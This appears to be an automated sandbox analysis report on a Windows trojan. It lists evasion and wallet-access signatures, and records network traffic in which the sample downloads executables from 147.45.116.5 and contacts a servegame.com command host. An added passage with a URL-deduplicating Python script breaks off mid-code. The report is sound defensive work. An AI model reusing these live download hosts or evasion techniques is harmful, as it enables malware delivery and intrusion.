Windows Analysis Report
Q0cWJo6Jvh.exe

Overview

General Information

Sample name: Q0cWJo6Jvh.exe (renamed because the original name is a hash value)
Original sample name: 414753e6caa05ca4a49546cec841ef10.exe
Analysis ID: 1528439
MD5: 414753e6caa05ca4a49546cec841ef10
SHA1: 998c0b4533f3e00eeacf441fbe29575198a574d4
SHA256: 5b9ed73fd7af6b0f9625ff30b925c84905e76b694a37e41d6207626b2fc3d2f6
Tags: 64, exe, trojan

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Modifies the windows firewall
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 97.1% probability
Source: C:\temp333\install_2.dll Code function: 2_2_6D3601F0 BCryptGenRandom,SystemFunction036, 2_2_6D3601F0
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: -----BEGIN RSA PUBLIC KEY----- memstr_41989d32-0
Source: Q0cWJo6Jvh.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: g2m.pdb source: install_2.dll, 00000002.00000002.3341287236.000000006D39D000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: install_2.dll, 00000002.00000003.2491716669.000000000254D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3378900514.000000006CAC5000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: install_2.dll, 00000002.00000002.3339175057.0000000000402000.00000002.00000001.01000000.00000004.sdmp, install_2.dll, 00000002.00000000.2124176727.0000000000402000.00000002.00000001.01000000.00000004.sdmp
Source: C:\temp333\install_2.dll Code function: 2_2_6D371F00 CloseHandle,memset,FindFirstFileW,FindClose, 2_2_6D371F00
Source: C:\temp333\install_2.dll Code function: 2_2_6D3716F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError, 2_2_6D3716F0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError, 5_2_6CAAC2D0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CFB16
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CFA66
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDA66
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF9B6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798D596D
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF779899CC9
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BBCC6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFD06
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDC76
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798CFBC6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDB26
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798BBED6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rax, qword ptr [rcx] 0_2_00007FF779853ED0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFF16
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BBE26
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFDC6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDD36
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BBD76
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BC0C6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r13 0_2_00007FF7798CE110
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF779830093
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFFD6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BC016
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798C7F40
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798AB26D
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798C74E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF716
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF666
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r15 0_2_00007FF779859850
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798CF876
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF7C6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798AD7FD
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r15 0_2_00007FF779887760
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CAAC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798CAAC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r13 0_2_00007FF7798CEAF0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 38h 0_2_00007FF7798CC9C0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 38h 0_2_00007FF7798C8CA0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798C4C90
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then xor r9d, r9d 0_2_00007FF7798CAD50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbp 0_2_00007FF77989AD8C
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF77989AF5C
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798BC226
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CA260
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798CA260
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BC176
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then xor r9d, r9d 0_2_00007FF7798CA4F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r14 0_2_00007FF779890430
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rsi 0_2_00007FF7798CC450
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rax, qword ptr [rcx+10h] 0_2_00007FF77984A439
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r15 0_2_00007FF77988C5B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r14 0_2_00007FF77989A5AC
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798B65DA
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 20:41:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 17:29:13 GMTETag: "296a00-623e65c079bb9"Accept-Ranges: bytesContent-Length: 2714112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 20:41:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 29 Aug 2024 19:15:37 GMTETag: "9dc0-620d74cbebcf6"Accept-Ranges: bytesContent-Length: 40384Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: */*host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: */*host: 147.45.116.5
Source: global traffic HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5F522C40.SERVEGAME.COMCONTENT-LENGTH: 7246
Source: Joe Sandbox View IP Address: 213.188.196.246 213.188.196.246
Source: global traffic HTTP traffic detected: GET /api/timezone/America/Sao_Paulo HTTP/1.1Connection: closeHost: worldtimeapi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: C:\temp333\install_2.dll Code function: 2_2_6D369F50 recv,WSAGetLastError, 2_2_6D369F50
Source: global traffic HTTP traffic detected: GET /FANTASMA/g2m.dll HTTP/1.1Connection: Keep-AliveUser-Agent: DownloadBinary/1.0Host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /FANTASMA/install_2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: DownloadBinary/1.0Host: 147.45.116.5
Source: global traffic DNS traffic detected: DNS query: time.nist.gov
Source: global traffic DNS traffic detected: DNS query: worldtimeapi.org
Source: global traffic DNS traffic detected: DNS query: tgb5f522c40.servegame.com
Source: unknown HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5F522C40.SERVEGAME.COMCONTENT-LENGTH: 7246
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 20:42:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000002.3340593841.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120627236.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724575479.00000279C734F000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120627236.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/1qd
Source: install_2.dll, 00000002.00000002.3340085430.0000000000477000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zip
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zipoE
Source: Q0cWJo6Jvh.exe, Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120575106.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dll
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dll3:G
Source: Q0cWJo6Jvh.exe String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dllDownloadBinary/1.0147.45.116.5FANTASMA/g2m.dllhttp://147.45.116.
Source: Q0cWJo6Jvh.exe, Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000002.3338900809.000000FD9BDF3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe9
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exeUq
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/X
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php?user-PC
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/index.php_j
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2120627236.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/iq
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/mq
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5:80/FANTASMA/g2m.dll
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340799261.00000279C7373000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2724376083.00000279C7372000.00000004.00000020.00020000.00000000.sdmp, Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5:80/FANTASMA/install_2.exepZ
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://code.google.com/p/swfobject/
Source: install_2.dll, 00000002.00000002.3340776852.000000000254C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://dev.w3.org/html5/websockets/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.io
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.io/license/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://gimite.net/en/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://javascript.crockford.com/jsmin.html
Source: install_2.dll, 00000002.00000002.3340776852.000000000254C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0&
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6455
Source: Amcache.hve.21.dr String found in binary or memory: http://upx.sf.net
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.esegece.com
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002AEE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000000E.00000003.2593369032.0000000002A6E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.foolabs.com/xpdf
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: ybtrrus.exe, 00000005.00000002.3343611670.00000000064CF000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000005.00000002.3372050029.000000000764C000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000000E.00000003.2591884945.000000000764C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.indyproject.org/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: install_2.dll, 00000002.00000003.2492972939.000000000254D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com.&nbsp;
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000005.00000002.3340950977.000000000102D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: ybtrrus.exe, 0000000E.00000002.2708285631.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.phpZ
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.php
Source: ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/support.php
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000005.00000002.3340950977.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeF
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeeow.
Source: ybtrrus.exe, 00000005.00000002.3340950977.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeh
Source: ybtrrus.exe, 00000005.00000002.3340950977.000000000100E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3376425505.0000000009AC6000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3340950977.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: ybtrrus.exe, 00000005.00000002.3342177805.0000000002BD3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000000.2496224369.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000000E.00000003.2593369032.0000000002B70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.secureblackbox.com
Source: ybtrrus.exe, 00000005.00000000.2497794253.0000000000B31000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: install_2.dll, 00000002.00000002.3341287236.000000006D39D000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://fontawesome.com
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://fontawesome.com/license/free
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/Yaffle/EventSource/
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection/issues/778#issuecomment-524853468
Source: ybtrrus.exe, 00000005.00000002.3362412952.0000000006CEF000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://github.com/muaz-khan/RecordRTC
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
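The URL entries above are memory-carved strings, so the same resource shows up several times: with and without an explicit ":80", and with overrun bytes where the scanner read past the string terminator ("0101.zipoE", "install_2.exe9", "g2m.dll3:G", "/1qd", "/X"). Only the 147.45.116.5 entries are the sample's own download infrastructure; the scootersoftware.com, fontawesome, indyproject and secureblackbox strings belong to the Beyond Compare product that ybtrrus.exe carries (note the BeyondCompare3 mutants and the "Scooter Software" roaming folder further down). The Python below is an added example, not part of the report or of any sandbox tooling: it parses a constructed subset of these lines, canonicalises each URL, collapses overrun variants onto the shorter observed form, merges the processes that referenced any variant, and flags IP-literal hosts for review first. MAX_OVERRUN and the "no '/' or '?' in the tail" rule are assumptions chosen for this report, and collapsing only works when the clean form was itself observed.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: a subset of this report's "String found in binary or memory" lines.
REPORT_LINES = """\
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2724408524.00000279C734F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340678022.00000279C7357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/1qd
Source: install_2.dll, 00000002.00000002.3340085430.0000000000477000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zip
Source: install_2.dll, 00000002.00000002.3339746540.000000000044E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zipoE
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/g2m.dll3:G
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340070385.00000279C7311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5:80/FANTASMA/g2m.dll
Source: Q0cWJo6Jvh.exe, 00000000.00000003.2177915595.00000279C736D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5/FANTASMA/install_2.exe9
Source: Q0cWJo6Jvh.exe, 00000000.00000002.3340799261.00000279C7373000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.116.5:80/FANTASMA/install_2.exepZ
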